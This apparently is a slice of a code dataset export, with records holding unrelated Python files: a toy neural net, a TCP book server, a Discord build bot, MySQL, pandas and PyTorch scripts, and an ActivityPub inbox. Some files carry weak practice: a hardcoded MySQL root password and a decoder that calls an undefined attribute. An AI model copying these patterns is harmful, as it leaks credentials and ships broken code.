d_h1_d_w1 = x[0] * deriv_sigmoid(sum_h1)\n d_h1_d_w2 = x[1] * deriv_sigmoid(sum_h1)\n d_h1_d_w3 = x[2] * deriv_sigmoid(sum_h1)\n d_h1_d_w4 = x[3] * deriv_sigmoid(sum_h1)\n d_h1_d_w5 = x[4] * deriv_sigmoid(sum_h1)\n d_h1_d_b1 = deriv_sigmoid(sum_h1)\n\n d_h2_d_w6 = x[0] * deriv_sigmoid(sum_h2)\n d_h2_d_w7 = x[1] * deriv_sigmoid(sum_h2)\n d_h2_d_w8 = x[2] * deriv_sigmoid(sum_h2)\n d_h2_d_w9 = x[3] * deriv_sigmoid(sum_h2)\n d_h2_d_w10 = x[4] * deriv_sigmoid(sum_h2)\n d_h2_d_b2 = deriv_sigmoid(sum_h2)\n\n self.weights[0] -= learn_rate * d_L_d_ypred * d_ypred_d_h1 * d_h1_d_w1\n self.weights[1] -= learn_rate * d_L_d_ypred * d_ypred_d_h1 * d_h1_d_w2\n self.weights[2] -= learn_rate * d_L_d_ypred * d_ypred_d_h1 * d_h1_d_w3\n self.weights[3] -= learn_rate * d_L_d_ypred * d_ypred_d_h1 * d_h1_d_w4\n self.weights[4] -= learn_rate * d_L_d_ypred * d_ypred_d_h1 * d_h1_d_w5\n self.bias[0] -= learn_rate * d_L_d_ypred * d_ypred_d_h1 * d_h1_d_b1\n\n self.weights[5] -= learn_rate * d_L_d_ypred * d_ypred_d_h2 * d_h2_d_w6\n self.weights[6] -= learn_rate * d_L_d_ypred * d_ypred_d_h2 * d_h2_d_w7\n self.weights[7] -= learn_rate * d_L_d_ypred * d_ypred_d_h2 * d_h2_d_w8\n self.weights[8] -= learn_rate * d_L_d_ypred * d_ypred_d_h2 * d_h2_d_w9\n self.weights[9] -= learn_rate * d_L_d_ypred * d_ypred_d_h2 * d_h2_d_w10\n self.bias[1] -= learn_rate * d_L_d_ypred * d_ypred_d_h2 * d_h2_d_b2\n\n self.weights[10] -= learn_rate * d_L_d_ypred * d_ypred_d_w5\n self.weights[11] -= learn_rate * d_L_d_ypred * d_ypred_d_w6\n self.bias[2] -= learn_rate * d_L_d_ypred * d_ypred_d_b3\n\n if epoch % 10 == 0:\n y_preds = np.apply_along_axis(self.feedforward, 1, data)\n loss = mse_loss(all_y_trues, y_preds)\n print(\"Epoch %d loss: %.3f\" % (epoch, loss))\n\n\ndef average(d_list):\n result = 0\n for t in d_list:\n result += t\n if len(d_list) > 0:\n result /= len(d_list)\n return result\n\n\nnetwork = NeuralNetwork()\n\n\ndef calc(q_list):\n global network\n return network.feedforward(np.asarray(q_list))\n\n\ndef run():\n global network\n data = []\n y_trues = []\n for i in range(0, 50):\n data.append([])\n for j in range(0, 5):\n data[i].append(random.uniform(-1, 1))\n y_trues.append(average(data[i]))\n\n network.train(np.asarray(data), np.asarray(y_trues))\n","sub_path":"neuron.py","file_name":"neuron.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"503085178","text":"from socket import *\nfrom tkinter import *\nfrom tkinter import messagebox\nimport threading\nfrom Hoster.M_DBOp.M_DBOperation import M_DBOperation\nimport time\nclass TcpHoster(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.flag = True\n self.host = '192.168.43.125'\n self.port = 4700\n self.buf = 1024\n self.addr = (self.host, self.port)\n\n\n def run(self):\n s = socket(AF_INET, SOCK_STREAM, 0)\n s.bind(self.addr)\n s.listen(5)\n\n while(True): #用于强迫 发生错误之后,重新进入等待连接状态\n try:\n while self.flag is not False:\n print('等待连接...\\r\\n')\n cs, caddr = s.accept()\n\n if self.flag is False:\n cs.close()\n print('...服务器停止\\r\\n')\n break\n if caddr is not self.host:\n print('...连接来自于:', caddr)\n data = '欢迎你的到来!\\r\\n'\n cs.sendall(bytes(data, 'utf-8'))\n\n recKeyWords = []\n while True:\n data = cs.recv(self.buf).decode('utf-8')\n print(data)\n if data == '==':\n break\n recKeyWords.append(data)\n print(recKeyWords)\n\n searchRec = ''\n if recKeyWords[0] == '1': #主页查书\n searchWords = recKeyWords[1:]\n searchRec = M_DBOperation(searchWords)\n\n if searchRec.selectBook():\n for singleLine in searchRec.selectBook():\n print(singleLine)\n singleLineChangeToStr = ','.join([str(i) for i in singleLine])\n print(singleLineChangeToStr)\n cs.sendall(bytes(singleLineChangeToStr,'utf-8'))\n time.sleep(0.1)\n\n time.sleep(0.1)\n cs.sendall(bytes('==', 'utf-8'))\n cs.close()\n break\n except Exception as e:\n messagebox.showerror('ERROR','Something bad happen\\nTcp Server is restarting')\n\n\n def stopThread(self):\n self.flag = False\n return\n\nclass hosterCtrl(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.hoster = None\n\n self.root = Tk()\n self.root.geometry('400x200')\n self.root.geometry('+500+200')\n self.root.resizable(0,0)\n\n labelBlank1 = Label(self.root)\n labelBlank1.pack(side = TOP)\n\n buttonStartThread = Button(self.root,text = 'START HOSTER',font = 'Consoles',command = self.startHoster)\n buttonStartThread.pack(side = TOP)\n\n labelBlank2 = Label(self.root)\n labelBlank2.pack(side = TOP)\n\n buttonEndThread = Button(self.root ,text = 'END HOSTER',font = 'Consoles',command = self.stopHoster)\n buttonEndThread.pack(side = TOP)\n\n labelBlank3 = Label(self.root)\n labelBlank3.pack(side = TOP)\n\n buttonCloseSystem = Button(self.root,text = 'END THIS SYSTEM',font = 'Consoles',command = self.closeSystem)\n buttonCloseSystem.pack(side = TOP)\n\n mainloop()\n\n def startHoster(self):\n if self.hoster is not None:\n messagebox.showwarning('tip', 'Hoster is already start')\n else:\n self.hoster = TcpHoster()\n self.hoster.start()\n messagebox.showinfo('tip', 'Hoster is start')\n\n def stopHoster(self):\n if self.hoster is None:\n messagebox.showwarning('tip', 'Hoster is already stop')\n\n else:\n self.hoster.stopThread()\n addr = (self.hoster.host, self.hoster.port)\n cs = socket(AF_INET, SOCK_STREAM, 0)\n cs.connect(addr)\n self.hoster = None\n messagebox.showinfo('tip', 'Hoster is stop')\n\n def closeSystem(self):\n if self.hoster is not None:\n messagebox.showwarning('tip', 'Hoster is not stop')\n else:\n messagebox.showinfo('tip', 'System will close soon')\n self.root.destroy()\n\nT_hosterCtrl = hosterCtrl()\nT_hosterCtrl.start()","sub_path":"组件/陈立达/Hoster/TCP-Hoster/hoster.py","file_name":"hoster.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"196492763","text":"import nextcord\nimport time\nimport os\nimport shutil\nfrom Auth.auth import disToken\nfrom make import RemoveMode1, RemoveMode2, Clear, getUSTVGO, replaceUStVicons, updateEPG, tar, MakeCS, MakeEng, MakeMain, Git, pushbulletMode\n\nTOKEN = disToken\n\ndef remPYC():\n if os.path.exists(\"Auth/__pycache__\"):\n shutil.rmtree(\"Auth/__pycache__\")\n\n if os.path.exists(\"Assets/python/__pycache__\"):\n shutil.rmtree(\"Assets/python/__pycache__\")\n\n if os.path.exists(\"Assets/USTVGO/scripts/__pycache__\"):\n shutil.rmtree(\"Assets/USTVGO/scripts/__pycache__\")\n\n if os.path.exists(\"EPG/Generator/__pycache__\"):\n shutil.rmtree(\"EPG/Generator/__pycache__\")\n\n if os.path.exists(\"__pycache__\"):\n shutil.rmtree(\"__pycache__\")\n\ndef Mode1(): \n RemoveMode1()\n getUSTVGO()\n replaceUStVicons()\n updateEPG()\n tar()\n MakeCS()\n MakeEng()\n MakeMain()\n time.sleep(10)\n Git()\n pushbulletMode(1)\n remPYC()\n \ndef Mode2():\n RemoveMode2()\n getUSTVGO()\n replaceUStVicons()\n MakeCS()\n MakeEng()\n MakeMain()\n Git()\n pushbulletMode(2)\n\ndef Mode3():\n Git()\n pushbulletMode(3)\n remPYC()\n\n\nprefix = \"!\"\n\nclass MyClient(nextcord.Client):\n async def on_ready(self):\n Clear()\n print('------')\n print(f'Logged in as {self.user} (ID: {self.user.id})')\n print('------')\n\n async def on_message(self, message):\n if message.author.id == self.user.id:\n return\n\n if message.content.startswith(prefix + 'mode1'):\n await message.reply('OK!')\n print(f\"Running Mode 1:\")\n Mode1()\n await message.reply(\"Done! - with EPG!\")\n\n if message.content.startswith(prefix + 'mode2'):\n await message.reply('OK!')\n print(f\"Running Mode 2:\")\n Mode2()\n await message.reply(\"Done! - without EPG!\")\n\n if message.content.startswith(prefix + 'mode3'):\n await message.reply('OK!')\n print(f\"Running Mode 3:\")\n Mode3()\n await message.reply(\"Done! - Just Pushed Into Repo!\")\n\n if message.content.startswith(prefix + 'cls'):\n print(f\"Clearing console:\")\n Clear()\n await message.reply(\"Done! - Console is now fresh and clean!\")\n\n if message.content.startswith(prefix + 'rempyc'):\n print(f\"Removing Pyc:\")\n await message.reply(\"Done! - Removed py\")\n\n\n if message.content.startswith('!help'):\n print(f\"Showing help message:\")\n embedVar = nextcord.Embed(\n title=\"Help:\", description=\"It looks like u need help :flushed:\", color=0x336EFF\n )\n embedVar.add_field(name=\"Run Mode 1\", value=\"!mode1\", inline=False)\n embedVar.add_field(name=\"Run Mode 2\", value=\"!mode2\", inline=False)\n embedVar.add_field(name=\"Run Mode 3\", value=\"!mode3\", inline=False)\n embedVar.add_field(name=\"Clear Console\", value=\"!cls\", inline=False)\n embedVar.add_field(name=\"remove __pycache__\", value=\"!rempyc\", inline=False)\n embedVar.add_field(name=\"Help\", value=\"!help\", inline=False)\n await message.channel.send(embed=embedVar)\n\nclient = MyClient()\nclient.run(TOKEN)\n","sub_path":"discord.py","file_name":"discord.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"645454724","text":"# -*- coding:utf-8 -*-\n__author__ = 'IanChen'\n\n#将 0001 题生成的 200 个激活码(或者优惠券)保存到 MySQL 关系型数据库中。\n\nimport pymysql\nimport sys\n\n# sys.path.append(r\"F:\\\\excercise\\question1\")#文件名不用用数字\n# from question1 import ...\nimport uuid\n\n\ndef create_code(number=200):\n result = []\n while True is True:\n temp = str(uuid.uuid1()).replace('-', '')\n if not temp in result:\n result.append(temp)\n if len(result) is number:\n break\n return result\ndef insert_code(code):\n conn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='1029384756', db='exercise',\n use_unicode=True, charset=\"utf8\")\n cursor = conn.cursor()\n cursor.execute('''\n insert into showmethecode(code) VALUES (%s)\n ''',code)\n conn.commit()\n\nif __name__ == \"__main__\":\n result=create_code()\n for i in range(200):\n insert_code(result[i])\n\n\n","sub_path":"excercise-master/002/0002.py","file_name":"0002.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"198513775","text":"from knock30 import load_txt\nimport collections\nSIZE = 15\n\nsentence_list = load_txt(\"neko.txt.mecab\")\n# 文である必要がないので、単語ごとにバラす(2次元 -> 1次元)\nword_list = [flatten for inner in sentence_list for flatten in inner]\nwords = list(map(lambda x: x[\"surface\"], word_list))\n# counterで数える\ncounter = collections.Counter(words)\n\n# 頻度が高い順に出力\nfor (value, count) in counter.most_common()[:SIZE]:\n print(value, count)","sub_path":"hirao/chapter04/knock36.py","file_name":"knock36.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"5730716","text":"import diskload\nimport math\nimport random\n\nuncompensated = diskload.Compensation.UNCOMPENSATED\nlove = diskload.love_numbers.read()\nlove = diskload.love_numbers.extrapolate( love, 4000000 )\n\nN = 1000\nw = 1.0\n\nalpha = 0.1\nmin_theta = alpha * 0.99\nmax_theta = alpha * 1.01\n\nbase = math.exp( math.log( max_theta / min_theta ) / (N-1) )\n\nf = open(\"data.csv\", \"w\")\n\nf.write(\"alpha theta alpha/theta U4K V4K G4K U40K V40K G40K U V G U400K V400K G400K U4M V4M G4M\\n\" )\n \nfor i in range(N):\n theta = (base ** i) * min_theta\n\n f.write(\"%e %e %e \" % (alpha, theta, theta/alpha) )\n \n f.write(\"%e %e %e \" % diskload.truncated( alpha, uncompensated, theta, w, 4000, love ) )\n f.write(\"%e %e %e \" % diskload.truncated( alpha, uncompensated, theta, w, 40000, love ) )\n f.write(\"%e %e %e \" % diskload.elliptic( alpha, uncompensated, theta, w, 40000, love ) )\n f.write(\"%e %e %e \" % diskload.truncated( alpha, uncompensated, theta, w, 400000, love ) )\n f.write(\"%e %e %e \" % diskload.truncated( alpha, uncompensated, theta, w, 4000000, love ) ) \n f.write(\"\\n\")\n","sub_path":"python/examples/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"522763480","text":"from mongokat import Document, Collection\n\n\nclass ShortNamesDocument(Document):\n \"\"\" This Document subclass supports limited alias names, as suggested in https://github.com/pricingassistant/mongokat/issues/13\n\n Note that they don't work in queries, field name lists, or dict(doc). Further subclassing would be necessary\n for that to work. Pull Requests welcome, though we won't include that in MongoKat itself.\n \"\"\"\n\n short_names = {\n \"description\": \"d\",\n \"value\": \"v\"\n }\n\n def __getitem__(self, key):\n if key in self.short_names:\n return self.get(self.short_names[key])\n return self.get(key)\n\n def __setitem__(self, key, value):\n if key in self.short_names:\n key = self.short_names[key]\n dict.__setitem__(self, key, value)\n\n\nclass ShortNamesCollection(Collection):\n document_class = ShortNamesDocument\n\n\ndef test_shortnames(db):\n db.test_shortnames.drop()\n SN = ShortNamesCollection(collection=db.test_shortnames)\n\n doc = SN({\"regular\": \"1\"})\n doc.save()\n\n docs = list(SN.find())\n print(docs)\n assert len(docs) == 1\n assert docs[0][\"regular\"] == \"1\"\n\n docs[0][\"value\"] = \"2\"\n docs[0].save()\n\n docs = list(SN.find())\n print(docs)\n print(dict(docs[0]))\n assert len(docs) == 1\n assert docs[0][\"value\"] == \"2\"\n assert docs[0][\"v\"] == \"2\"\n\n # Bypass mongokat to see the real document\n raw_docs = list(db.test_shortnames.find())\n assert len(raw_docs) == 1\n assert \"value\" not in raw_docs[0]\n assert raw_docs[0][\"v\"] == \"2\"\n","sub_path":"tests/test_shortnames.py","file_name":"test_shortnames.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"344811139","text":"\nfrom pathdiff import path_diff\nimport json\nimport textwrap\nimport envtool\nimport sys\nimport subprocess\n\ndef get_effect(env_before, env_after):\n ''' Outputs shell code representing the difference\n between the two environments.\n\n Ideally, 'envdiff --shell SHELL COMMAND' will produce\n code for SHELL exporting new variables, unsetting deleted\n variables and modifying new variables.\n '''\n new_vars = set(env_after.env) - set(env_before.env)\n deleted_vars = set(env_before.env) - set(env_after.env)\n common_vars = set(env_before.env).intersection(set(env_after.env))\n\n report = []\n report.append('# \\033[1;32m========== New variables ===========\\033[0m')\n for var in sorted(new_vars):\n report.append(env_after.get_declaration(var))\n\n report.append('# \\033[1;31m========== Deleted variables =======\\033[0m')\n for var in sorted(deleted_vars):\n report.append(env_before.get_unsetting(var))\n\n report.append('# \\033[1;32m========= Changed Vars =============\\033[0m')\n for var in sorted(common_vars):\n before = env_before.env[var]\n after = env_after.env[var]\n if before != after:\n report.append(env_before.get_change(var, before, after))\n return '\\n'.join(report)\n\n\ndef compare_envs(env_before, env_after):\n ''' Return a string giving a report of the differences between the two\n environment objects '''\n new_vars = set(env_after.env) - set(env_before.env)\n deleted_vars = set(env_before.env) - set(env_after.env)\n common_vars = set(env_before.env).intersection(set(env_after.env))\n modified_vars = []\n unchanged_vars = []\n for var in sorted(common_vars):\n before = env_before.env[var]\n after = env_after.env[var]\n if before == after:\n unchanged_vars.append(var)\n else:\n modified_vars.append(var)\n\n report = []\n\n report.append('# \\033[1;34m========== unchanged variables ===========\\033[0m')\n for var in sorted(unchanged_vars):\n before = env_before.env[var]\n after = env_after.env[var]\n report.append(env_after.get_pretty_str(var))\n\n report.append('# \\033[1;32m========== New variables ===========\\033[0m')\n for var in sorted(new_vars):\n report.append(env_after.get_pretty_str(var))\n\n report.append('# \\033[1;31m========== Deleted variables =======\\033[0m')\n for var in sorted(deleted_vars):\n report.append(env_before.get_pretty_str(var))\n\n report.append('# \\033[1;33m========= Changed Vars =============\\033[0m')\n for var in sorted(modified_vars):\n before = env_before.env[var]\n after = env_after.env[var]\n if var in envtool.comparers:\n result = envtool.comparers[var](before, after)\n if result != '':\n report.append(var + '\\n' + result)\n else:\n report.append(textwrap.dedent(f'''\n {var}\n BEFORE: {env_before.get_str(var)}\n AFTER: {env_after.get_str(var)}\n ''').strip()\n )\n\n return '\\n'.join(report)\n\n\ndef env_diff(command):\n # We could get this envrionment by just doing\n # env_before = envtool.EnvWrapper.from_environment_dict()\n # but we do both the same way so that things like SHLVL will match up\n # in both\n before_script = f'''\n {sys.executable} -c 'import json, os ; print(json.dumps(dict(os.environ)))'\n '''\n result = subprocess.run(before_script, shell=True, universal_newlines=True, stdout=subprocess.PIPE, check=True)\n env_before = envtool.EnvWrapper.from_environment_dict(json.loads(result.stdout))\n\n after_script = f'''\n eval {command} 1>&2\n echo \"Command {command} complete\" >&2\n {sys.executable} -c 'import json, os ; print(json.dumps(dict(os.environ)))'\n # Redirect 1 to 2 in case the command has set up traps that may print to stdout\n exec 1>&2\n '''\n\n result = subprocess.run([\"/bin/bash\", \"-c\", after_script], universal_newlines=True, stdout=subprocess.PIPE)\n #\n # NOTE: From cypthon:Lib/subprocess.py:1710, setting shell=True and passing\n # a string for args causes the string args to be passed to 'sh -c' and it\n # seems that `sh -c` stops when a syntax error is encountered in a sourced\n # file.\n #\n # after_script = '''\n # source a_file_that_contains_syntax_error.sh\n # echo 'end'\n # '''\n #\n # I.E. we don't see the 'end' being printed. If after_script was a file,\n # and we sourced that file in an interactive /bin/sh, then we do see the\n # 'end' string being printed.\n #\n # With BASH, the behavior is the same in interactive or with 'bash -c' we\n # see the 'end' being printed. Since the content of {command} in after_script\n # is likely something like 'source some_file' and 'some_file' may source\n # any number of files and so on, one of which may have a syntax error, it\n # is makes a big difference to use the above call to subprocess.run()\n # instead of the two below ones\n #\n # result = subprocess.run(after_script, shell=True, ...)\n # result = subprocess.run([\"/bin/sh\", \"-c\", after_script], ...)\n if result.returncode != 0:\n print(f\"{sys.argv[0]} : \\033[33mWARNING\\033[0m: command returned non-zero exit code {result.returncode}\")\n\n if result.stdout.strip() == \"\":\n print(f'{sys.argv[0]}: \\033[1;31mERROR\\033[0m: Command failed, could not get environment after command')\n return None\n\n env_after = envtool.EnvWrapper.from_environment_dict(json.loads(result.stdout))\n\n return {\n 'before': env_before,\n 'after': env_after\n }\n\n\ndef diff_command(args):\n envs = env_diff(' '.join(args.posargs))\n if envs is None:\n return\n if args.shell:\n print(get_effect(envs['before'], envs['after']))\n elif args.executables:\n path_diff(envs['before']['PATH'], envs['after']['PATH'])\n else:\n print(compare_envs(envs['before'], envs['after']))\n","sub_path":"libexec/env-tools/envdiff.py","file_name":"envdiff.py","file_ext":"py","file_size_in_byte":5995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"511577958","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 2 11:38:47 2021\n\n@author: oislen\n\"\"\"\n\n# load relevant libraries\nfrom matplotlib import pyplot as plt\n\ndef plot_errors(errors_index,\n img_errors,\n pred_labels, \n obs_labels,\n nrows = 2,\n ncols = 3\n ):\n \n \"\"\" \n \n Plot Errors Documention\n \n Function Overview\n \n This function plots images with their predicted and real labels.\n \n Defaults\n \n plot_errors(errors_index,\n img_errors,\n pred_labels, \n obs_labels,\n nrows = 2,\n ncols = 3\n )\n \n Parameters\n \n errors_index - np.array, the image indices to plot \n img_errors - np.array, the image pixels \n pred_labels - np.array, the predicted labels\n obs_labels - np.array, the observed labels\n \n Returns\n \n 0 for successful execution\n \n Source \n \n https://www.kaggle.com/yassineghouzam/introduction-to-cnn-keras-0-997-top-6\n \n \"\"\"\n \n # set plot index\n idx = 0\n \n # create subplot canvas\n fig, ax = plt.subplots(nrows = nrows,\n ncols = ncols,\n sharex = True,\n sharey = True\n )\n \n # loop through rows\n for row in range(nrows):\n \n # loop through columns\n for col in range(ncols):\n \n # extract out error\n error = errors_index[idx]\n \n # plot image\n ax[row,col].imshow(img_errors[error][:, :, 0])\n \n # extract out error info\n pred_error = pred_labels[error]\n obs_error = obs_labels[error]\n \n # create error label\n err_label = \"Predicted label :{}\\nTrue label :{}\".format(pred_error, obs_error)\n \n # assign error label to plot\n ax[row,col].set_title(err_label)\n \n # increment plot index\n idx += 1\n \n return 0","sub_path":"competitions/Digit_Recognizer/scripts/graph/plot_errors.py","file_name":"plot_errors.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"324659038","text":"# 1\n\nimport pandas as pd\n\ndata = pd.read_csv(r'539_m6_datasets_v1.0\\Salaries.csv',delimiter=',')\n\ngrp = data.groupby('Year')\n\ntotalpay1 = sum(grp.get_group(2011)['TotalPayBenefits'])\ntotalpay2 = sum(grp.get_group(2014)['TotalPayBenefits'])\n\nprint('Total salary cost has increased by,',totalpay2-totalpay1 ,'from year 2011 to 2014')\n\n# 2\n\ngrp1 = data[data.Year==2014].groupby(['JobTitle'])\n\nmeans = grp1.mean()\nh=dict(means['TotalPayBenefits'])\n\nimport operator\n\nmax(h.items(),key=operator.itemgetter(1))[0]\nmax(h.items(),key=operator.itemgetter(1))[1]\n\nprint('Title in Year 2014 having highest mean salary of',max(h.items(),key=operator.itemgetter(1))[1] ,'is',max(h.items(),key=operator.itemgetter(1))[0])\n\n# 3\n\ngrp = data.groupby('Year')\n\ngrp.get_group(2014).sum()['OvertimePay']\n\nprint('Money that could have been saved in Year 2014 by stopping OverTimePay is',grp.get_group(2014).sum()['OvertimePay'])\n\n# 4\n\ngrp1 = data[data.Year==2014].groupby(['JobTitle'])\n\nmeans = grp1.mean()\n\ndata_sorted = means.sort_index(by='TotalPayBenefits',ascending=False)\n\ntop_5 = data_sorted.iloc[:5,6]\n\nh = dict(top_5)\n\nprint('Top 5 common job in Year 2014 and how much do they cost SFO is as follows')\ni=1\nfor key,value in h.items():\n print(i,'.',key,':',value)\n i+=1\n \n# 5\n\ngrp = (data.groupby(['Year','JobTitle']))\nmeans = grp.sum()\nh=dict(means['TotalPayBenefits'])\n\nimport operator\n\nmax(h.items(),key=operator.itemgetter(1))[0]\nmax(h.items(),key=operator.itemgetter(1))[1]\n\nprint('Top earning employee across all years',max(h.items(),key=operator.itemgetter(1))[0][0],'is',max(h.items(),key=operator.itemgetter(1))[0][1],'and the total salary is',max(h.items(),key=operator.itemgetter(1))[1])\n\n# Enhancements for code\n\n# 1\ngrp1 = data[data.Year==2014].groupby(['JobTitle'])\n\nmeans = grp1.mean()\n\ndata_sorted = means.sort_index(by='TotalPayBenefits',ascending=True)\n\nbot_5 = data_sorted.iloc[:5,6]\n\nh = dict(bot_5)\n\nprint('Last 5 common job in Year 2014 and how much do they cost SFO is as follows')\ni=1\nfor key,value in h.items():\n print(i,'.',key,':',value)\n i+=1\n\n# 2\ngrp = data.groupby('Year')\n\ntotal_overtime = sum(grp.get_group(2011)['OvertimePay'])\ntotal_pay = sum(grp.get_group(2011)['TotalPayBenefits'])\n\nprint('OverTimePay is',(total_overtime/total_pay)*100,'percentage of TotalPayBenefits')\n\n# 3\ngrp1 = data[data.Year==2014].groupby(['JobTitle'])\n\nmeans = grp1.mean()\nh=dict(means['TotalPayBenefits'])\n\nimport operator\n\nmin(h.items(),key=operator.itemgetter(1))[0]\nmin(h.items(),key=operator.itemgetter(1))[1]\n\nprint('Title in Year 2014 having lowest mean salary of',min(h.items(),key=operator.itemgetter(1))[1] ,'is',min(h.items(),key=operator.itemgetter(1))[0])\n \n","sub_path":"Module6_b.py","file_name":"Module6_b.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"290177606","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom kospeech.models.modules import BaseRNN\nfrom kospeech.models.attention import MultiHeadAttention\nfrom torch import Tensor\n\n\nclass SpellingCorrectorDecoder(nn.Module):\n def __init__(\n self,\n num_classes: int, # number of classfication\n max_length: int = 120, # a maximum allowed length for the sequence to be processed\n hidden_dim: int = 1024, # dimension of RNN`s hidden state vector\n sos_id: int = 1, # start of sentence token`s id\n eos_id: int = 2, # end of sentence token`s id\n num_heads: int = 4, # number of attention heads\n num_layers: int = 3, # number of RNN layers\n rnn_type: str = 'lstm', # type of RNN cell\n dropout_p: float = 0.3, # dropout probability\n device: str = 'cuda' # device - 'cuda' or 'cpu'\n ) -> None:\n super(SpellingCorrectorDecoder, self).__init__()\n self.num_classes = num_classes\n self.num_heads = num_heads\n self.max_length = max_length\n self.eos_id = eos_id\n self.sos_id = sos_id\n self.embedding = nn.Embedding(num_classes, hidden_dim)\n self.input_dropout = nn.Dropout(dropout_p)\n\n self.layers = nn.ModuleList([\n SpellingCorrectorDecoderLayer(\n hidden_dim=hidden_dim,\n rnn_type=rnn_type,\n dropout_p=dropout_p,\n device=device\n ) for _ in range(num_layers)\n ])\n\n self.attention = MultiHeadAttention(hidden_dim)\n\n def forward(self, inputs: Tensor, encoder_outputs: Tensor) -> Tensor:\n inputs = self.embedding(inputs)\n output = self.rnn(inputs)\n\n context, attn = self.attention(output, encoder_outputs, encoder_outputs)\n\n for layer in self.layers:\n output = layer(output)\n\n output = F.log_softmax(output, dim=-1)\n output += F.log_softmax(context, dim=-1)\n\n return output\n\n\nclass SpellingCorrectorDecoderLayer(BaseRNN):\n def __init__(self, hidden_dim, rnn_type, dropout_p, device):\n super(SpellingCorrectorDecoderLayer, self).__init__(\n input_size=hidden_dim << 1,\n hidden_dim=hidden_dim,\n num_layers=1,\n rnn_type=rnn_type,\n dropout_p=dropout_p,\n bidirectional=False,\n device=device\n )\n self.dropout = nn.Dropout(dropout_p=dropout_p)\n\n def forward(self, query, context):\n residual = query\n output = torch.cat((query, context), dim=2)\n\n output = self.rnn(output)\n output = self.dropout(output)\n\n return output + residual\n","sub_path":"kospeech/models/spelling_corrector/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"339831143","text":"######################################################\n# Nama file: list-modify.py\n######################################################\n\ndef main():\n # membuat list\n buah = [\"durian\", \"mangga\", \"apel\"]\n print(\"Sebelum diubah:\")\n print(buah)\n\n # mengubah nilai elemen list\n buah[1] = \"salak\"\n buah[-1] = \"pepaya\"\n\n # menampilkan hasil perubahan\n print(\"\\nSetelah diubah:\")\n print(buah)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bab/bab-2/list-modify.py","file_name":"list-modify.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"400027586","text":"''' handles all of the activity coming in to the server '''\nfrom base64 import b64decode\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Signature import pkcs1_15\nfrom Crypto.Hash import SHA256\nfrom django.http import HttpResponse, HttpResponseBadRequest, \\\n HttpResponseNotFound, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nimport django.db.utils\nimport json\nimport requests\n\nfrom fedireads import activitypub\nfrom fedireads import models\nfrom fedireads import outgoing\nfrom fedireads.status import create_review, create_status, create_tag\nfrom fedireads.remote_user import get_or_create_remote_user\n\n\n@csrf_exempt\ndef shared_inbox(request):\n ''' incoming activitypub events '''\n # TODO: should this be functionally different from the non-shared inbox??\n if request.method == 'GET':\n return HttpResponseNotFound()\n\n try:\n activity = json.loads(request.body)\n except json.decoder.JSONDecodeError:\n return HttpResponseBadRequest()\n\n try:\n verify_signature(request)\n except ValueError:\n return HttpResponse(status=401)\n\n response = HttpResponseNotFound()\n if activity['type'] == 'Follow':\n response = handle_incoming_follow(activity)\n\n elif activity['type'] == 'Undo':\n response = handle_incoming_undo(activity)\n\n elif activity['type'] == 'Create':\n response = handle_incoming_create(activity)\n\n elif activity['type'] == 'Accept':\n response = handle_incoming_follow_accept(activity)\n\n elif activity['type'] == 'Like':\n response = handle_incoming_favorite(activity)\n\n elif activity['type'] == 'Add':\n response = handle_incoming_add(activity)\n\n # TODO: Add, Undo, Remove, etc\n\n return response\n\n\ndef verify_signature(request):\n ''' verify rsa signature '''\n signature_dict = {}\n for pair in request.headers['Signature'].split(','):\n k, v = pair.split('=', 1)\n v = v.replace('\"', '')\n signature_dict[k] = v\n\n try:\n key_id = signature_dict['keyId']\n headers = signature_dict['headers']\n signature = b64decode(signature_dict['signature'])\n except KeyError:\n raise ValueError('Invalid auth header')\n\n response = requests.get(\n key_id,\n headers={'Accept': 'application/activity+json'}\n )\n if not response.ok:\n raise ValueError('Could not load public key')\n\n actor = response.json()\n key = RSA.import_key(actor['publicKey']['publicKeyPem'])\n\n comparison_string = []\n for signed_header_name in headers.split(' '):\n if signed_header_name == '(request-target)':\n comparison_string.append('(request-target): post %s' % request.path)\n else:\n comparison_string.append('%s: %s' % (\n signed_header_name,\n request.headers[signed_header_name]\n ))\n comparison_string = '\\n'.join(comparison_string)\n\n signer = pkcs1_15.new(key)\n digest = SHA256.new()\n digest.update(comparison_string.encode())\n\n # raises a ValueError if it fails\n signer.verify(digest, signature)\n\n return True\n\n\n@csrf_exempt\ndef inbox(request, username):\n ''' incoming activitypub events '''\n # 